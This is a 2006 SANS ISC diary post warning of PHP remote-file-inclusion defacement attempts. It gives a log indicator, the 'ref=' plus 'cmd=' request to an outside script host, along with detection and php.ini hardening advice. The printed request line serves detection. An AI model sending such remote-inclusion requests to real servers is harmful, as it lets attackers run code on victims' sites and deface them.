Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - Probable php shell/web defacement tool usage on the rise InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Probable php shell/web defacement tool usage on the rise

Published: 2006-01-09
Last Updated: 2006-01-09 23:00:39 UTC
by William Salusky (Version: 2)
0 comment(s)
The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initally reported site hosting the php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  Clearly the common thread will be 'ref=' and 'cmd=' on the same http log entry.  Looks fairly trivial to create a snort signature to identify this scanning/abuse considering that this is an edge case that bleedingsnort rules does not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

allow_url_fopen = Off

We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically.  As with any complex PHP application, keep them patched.
0 comment(s)
Diary Archives